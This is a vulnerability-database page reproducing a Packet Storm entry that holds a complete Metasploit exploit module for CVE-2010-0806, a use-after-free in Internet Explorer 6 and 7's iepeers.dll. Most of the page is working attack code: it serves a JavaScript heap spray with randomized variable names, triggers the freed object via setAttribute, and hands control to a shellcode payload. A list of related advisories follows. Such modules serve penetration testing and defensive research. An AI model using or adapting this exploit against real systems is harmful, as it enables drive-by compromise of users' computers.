Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTrancerPACKETSTORM:87102
HistoryMar 11, 2010 - 12:00 a.m.

Microsoft Internet Explorer iepeers.dll Use After Free

2010-03-1100:00:00
Trancer
packetstormsecurity.com
23

EPSS

0.973

Percentile

99.9%

JSON
`##  
# $Id: ie_iepeers_pointer.rb 8774 2010-03-10 22:07:04Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
##  
# ie_iepeers_pointer.rb  
#  
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework  
#  
# Tested successfully on the following platforms:  
# - Microsoft Internet Explorer 7, Windows Vista SP2  
# - Microsoft Internet Explorer 7, Windows XP SP3  
# - Microsoft Internet Explorer 6, Windows XP SP3  
#  
# Exploit found in-the-wild. For additional details:  
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/  
#  
# Trancer  
# http://www.rec-sec.com  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Internet Explorer iepeers.dll Use After Free',  
'Description' => %q{  
This module exploits a use-after-free vulnerability within iepeers.dll of  
Microsoft Internet Explorer versions 6 and 7.  
  
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'unknown', # original discovery  
'Trancer <mtrancer[at]gmail.com>', # metasploit module  
'jduck' # minor cleanups  
],  
'Version' => '$Revision: 8774 $',  
'References' =>  
[  
[ 'CVE', '2010-0806' ],  
[ 'OSVDB', '62810' ],  
[ 'BID', '38615' ],  
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],  
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]  
],  
'DisclosureDate' => 'Mar 09 2010',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Encode the shellcode  
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  
  
# Set the return\nops  
ret = Rex::Text.to_unescape([target.ret].pack('V'))  
  
# Randomize the javascript variable names  
j_shellcode = rand_text_alpha(rand(100) + 1)  
j_nops = rand_text_alpha(rand(100) + 1)  
j_slackspace = rand_text_alpha(rand(100) + 1)  
j_fillblock = rand_text_alpha(rand(100) + 1)  
j_memory = rand_text_alpha(rand(100) + 1)  
j_counter = rand_text_alpha(rand(30) + 2)  
j_ret = rand_text_alpha(rand(100) + 1)  
j_array = rand_text_alpha(rand(100) + 1)  
j_function1 = rand_text_alpha(rand(100) + 1)  
j_function2 = rand_text_alpha(rand(100) + 1)  
j_object = rand_text_alpha(rand(100) + 1)  
j_id = rand_text_alpha(rand(100) + 1)  
  
# Build out the message  
html = %Q|<html><body>  
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>  
<script language='javascript'>  
function #{j_function1}(){  
var #{j_shellcode} = unescape('#{shellcode}');  
#{j_memory} = new Array();  
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);  
var #{j_nops} = unescape('#{ret}');  
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }  
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);  
delete #{j_nops};  
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {  
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};  
}  
}  
function #{j_function2}(){  
#{j_function1}();  
var #{j_object} = document.createElement('body');  
#{j_object}.addBehavior('#default#userData');  
document.appendChild(#{j_object});  
try {  
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {  
#{j_object}.setAttribute('s',window);  
}  
} catch(e){ }  
window.status+='';  
}  
  
document.getElementById('#{j_id}').onclick();  
</script></body></html>  
|  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the compressed response to the client  
send_response(cli, html, { 'Content-Type' => 'text/html' })  
  
# Handle the payload  
handler(cli)  
  
end  
  
end  
`

Related

checkpoint_advisories 3
threatpost 4
openvas 4
cert 1
exploitdb 2
canvas 1
exploitpack 1
seebug 3
saint 4
metasploit 1
prion 1
zdt 1
packetstorm 1
cvelist 1
cve 1
nvd 1
securityvulns 2
nessus 1
checkpoint_advisories
checkpoint_advisories
Internet Explorer iepeers.dll Remote Code Execution - Ver2 (CVE-2010-0806)
2014-01-07 00:00:00
Internet Explorer iepeers.dll Use-After-Free - Ver2 (CVE-2010-0806)
2014-02-03 00:00:00
Internet Explorer iepeers.dll Remote Code Execution (CVE-2010-0806)
2010-03-10 00:00:00
threatpost
threatpost
Exploit Code Published for Latest IE Zero-Day
2010-03-10 23:31:23
Microsoft Plugs IE Drive-By Download Flaws
2010-03-30 20:30:48
Old and Insecure, IE6 Still Popular in the Enterprise
2010-08-18 23:07:23
openvas
openvas
Microsoft Internet Explorer RCE Vulnerability (981374)
2010-03-10 00:00:00
MS Internet Explorer Remote Code Execution Vulnerability (981374)
2010-03-10 00:00:00
Microsoft Internet Explorer Multiple Vulnerabilities (980182)
2010-04-01 00:00:00
cert
cert
Microsoft Internet Explorer iepeers.dll use-after-free vulnerability
2010-03-09 00:00:00
exploitdb
exploitdb
Microsoft Internet Explorer - &#039;iepeers.dll&#039; Use-After-Free (Metasploit)
2010-03-10 00:00:00
Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)
2010-12-14 00:00:00
canvas
canvas
Immunity Canvas: IE_PEERS_SETATTRIBUTE
2010-03-10 22:30:00
exploitpack
exploitpack
Microsoft Internet Explorer - iepeers.dll Use-After-Free (Metasploit)
2010-03-10 00:00:00
seebug
seebug
Microsoft IEη•Έε½’ε―Ήθ±‘ζ“δ½œε†…ε­˜η ΄εζΌζ΄ž
2010-03-10 00:00:00
Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
2014-07-01 00:00:00
Internet Explorer DHTML Behaviors Use After Free
2014-07-01 00:00:00
saint
saint
Internet Explorer iepeers.dll use-after-free vulnerability
2010-04-02 00:00:00
Internet Explorer iepeers.dll use-after-free vulnerability
2010-04-02 00:00:00
Internet Explorer iepeers.dll use-after-free vulnerability
2010-04-02 00:00:00
metasploit
metasploit
MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
2010-04-26 18:29:24
prion
prion
Memory corruption
2010-03-10 22:30:00
zdt
zdt
Microsoft Internet Explorer iepeers.dll use-after-free exploit (meta)
2010-03-11 00:00:00
packetstorm
packetstorm
Internet Explorer DTHML Behaviors Use After Free
2010-04-01 00:00:00
cvelist
cvelist
CVE-2010-0806
2010-03-10 22:00:00
cve
cve
CVE-2010-0806
2010-03-10 22:30:01
nvd
nvd
CVE-2010-0806
2010-03-10 22:30:01
securityvulns
securityvulns
Microsoft Security Bulletin MS10-018 - Critical Cumulative Security Update for Internet Explorer &#40;980182&#41;
2010-03-31 00:00:00
Microsoft Internet Explorer multiple security vulnerabilities
2010-04-05 00:00:00
nessus
nessus
MS10-018: Cumulative Security Update for Internet Explorer (980182)
2010-03-30 00:00:00

EPSS

0.973

Percentile

99.9%

JSON
Related for PACKETSTORM:87102
checkpoint_advisories3threatpost4openvas4cert1exploitdb2canvas1exploitpack1seebug3saint4metasploit1prion1zdt1packetstorm1cvelist1cve1nvd1securityvulns2nessus1